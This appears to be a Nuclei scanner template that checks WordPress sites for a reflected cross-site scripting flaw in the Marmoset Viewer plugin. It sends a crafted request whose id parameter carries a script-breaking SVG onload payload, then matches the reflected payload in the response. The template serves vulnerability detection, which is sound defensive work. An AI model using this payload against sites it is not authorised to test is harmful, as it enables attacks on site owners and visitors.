id: wp-plugin-marmoset-viewer-xss

info:
  name: Wordpress Plugin Marmoset Viewer XSS
  author: johnjhacking
  severity: medium
  tags: wordpress,xss
  reference: https://wordpress.org/plugins/marmoset-viewer/#developers

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "</script><svg/onload=alert('{{randstr}}')>"
          - "Marmoset Viewer"
        part: body
        condition: and